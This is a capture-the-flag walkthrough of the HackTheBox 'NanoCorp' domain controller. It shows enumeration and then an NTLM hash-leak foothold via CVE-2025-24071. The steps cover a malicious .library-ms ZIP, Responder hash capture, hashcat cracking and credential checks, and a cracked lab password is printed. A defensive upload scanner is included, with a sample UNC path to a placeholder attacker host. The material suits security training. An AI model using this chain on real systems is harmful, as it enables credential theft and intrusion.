NanoCorp - HackTheBox Writeup
Machine Information
- Name: NanoCorp
- OS: Windows Server 2022
- Difficulty: Hard
- IP: BOX_IP
Enumeration
Initial Nmap Scan
nmap -p- --min-rate 10000 BOX_IP
nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5986,9389 -sCV BOX_IP
Port Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb)
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open globalcatLDAPssl
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (WinRM HTTPS)
9389/tcp open mc-nmf .NET Message Framing (ADWS)
Key Observations:
- This is a Domain Controller (DNS, LDAP, Kerberos, ADWS)
- Web server running on port 80 (Apache)
- WinRM available on port 5986 (HTTPS)
- Domain name: nanocorp.htb
Web Enumeration
# Add to /etc/hosts
echo "BOX_IP dc01.nanocorp.htb nanocorp.htb" | sudo tee -a /etc/hosts
# Check main site
curl http://nanocorp.htb
whatweb http://nanocorp.htb
# Subdomain fuzzing with feroxbuster
feroxbuster -u http://BOX_IP \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
-H "Host: FUZZ.nanocorp.htb" \
--filter-status 404 \
-t 50 \
-o ferox-subdomains.txt
Discovered Subdomain:
hire.nanocorp.htb - Job application portal with file upload functionality
# Add subdomain to /etc/hosts
echo "BOX_IP hire.nanocorp.htb" | sudo tee -a /etc/hosts
Browsing to http://hire.nanocorp.htb reveals a job application form with resume/document upload capability.
Initial Foothold - CVE-2025-24071
Vulnerability Overview
CVE-2025-24071 is a Windows File Explorer vulnerability that causes NTLM hash leakage when a user extracts a ZIP archive containing a malicious .library-ms file. Windows Explorer automatically initiates an SMB authentication request to an attacker-controlled server without user interaction beyond extraction.
Reference: https://github.com/0x6rss/CVE-2025-24071_PoC
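From the defensive side, the upload portal described above is the control point: a resume submission has no legitimate reason to contain a Windows Library Description file, so the server can reject any ZIP carrying a .library-ms entry before a staff member ever extracts it. The scanner below is an added example, not code from the writeup or the PoC repository; the minimal library XML and the ATTACKER_IP_PLACEHOLDER host it embeds are constructed purely to exercise the check.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace declared by Windows Library Description (.library-ms) documents
LIB_NS = "{http://schemas.microsoft.com/windows/2009/library}"


def unc_targets(xml_bytes):
    """Return every <url> value in a .library-ms document that points at a UNC path or file:// URL."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return []  # malformed XML: still flagged by the caller because of the extension
    hits = []
    for el in root.iter():
        if el.tag in (LIB_NS + "url", "url") and el.text:
            target = el.text.strip()
            if target.startswith("\\\\") or target.lower().startswith("file://"):
                hits.append(target)
    return hits


def scan_upload(zip_bytes):
    """Scan an uploaded ZIP and return [(entry_name, [remote targets])] for every .library-ms entry.
    Any such entry is a finding, even without a remote url: reject the upload, do not extract it."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".library-ms"):
                findings.append((info.filename, unc_targets(zf.read(info))))
    return findings


# Constructed sample: a placeholder PDF plus a library file whose location is a
# placeholder UNC host. This is test input for the scanner, not the PoC's output.
SAMPLE_LIBRARY_MS = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
    b'<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>'
    b'<url>\\\\ATTACKER_IP_PLACEHOLDER\\share</url>'
    b'</simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>'
    b'</libraryDescription>'
)


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("resume.pdf", b"%PDF-1.4 constructed placeholder")
        zf.writestr("resume.library-ms", SAMPLE_LIBRARY_MS)
    return buf.getvalue()


if __name__ == "__main__":
    for name, targets in scan_upload(build_sample_zip()):
        print(f"REJECT upload: {name} -> {targets}")
```

Beyond blocking at upload time, the same outbound SMB connection that Responder catches in this writeup is what egress filtering of TCP/445 from client subnets and SMB signing/NTLM restrictions on the domain are meant to stop.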
Exploitation
1. Generate malicious exploit ZIP:
# Clone the exploit repository
git clone https://github.com/0x6rss/CVE-2025-24071_PoC
cd CVE-2025-24071_PoC
# Generate exploit.zip with your attacking IP
python3 poc.py --ip 10.10.x.x --filename exploit --output-dir .
This creates exploit.zip containing a malicious .library-ms file that points to your SMB server.
2. Start Responder to capture NTLM hashes:
# Start Responder on tun0 interface
sudo responder -I tun0 -v
3. Upload the malicious ZIP:
- Navigate to http://hire.nanocorp.htb and use the job application form
- Upload exploit.zip as a resume/document attachment
- Submit the application
4. Wait for hash capture:
When an admin or HR staff member extracts the ZIP file, Windows automatically attempts to connect to your SMB server, and Responder captures the NTLMv2 hash.
[SMB] NTLMv2-SSP Client : BOX_IP
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:...
5. Crack the hash with hashcat:
# Save the captured hash
echo 'web_svc::NANOCORP:...[captured_hash]...' > web_svc.hash
# Crack using hashcat with rockyou wordlist
hashcat -m 5600 web_svc.hash /usr/share/wordlists/rockyou.txt
# Alternatively, use john
john --wordlist=/usr/share/wordlists/rockyou.txt web_svc.hash
Cracked credentials: web_svc:dksehdgh712!@#
Credential Verification
# Verify credentials work
crackmapexec smb BOX_IP -u 'web_svc' -p 'dksehdgh712!@#'
# Check available shares
crackmapexec smb BOX_IP -u 'web_svc' -p 'dksehdgh712!@#' --shares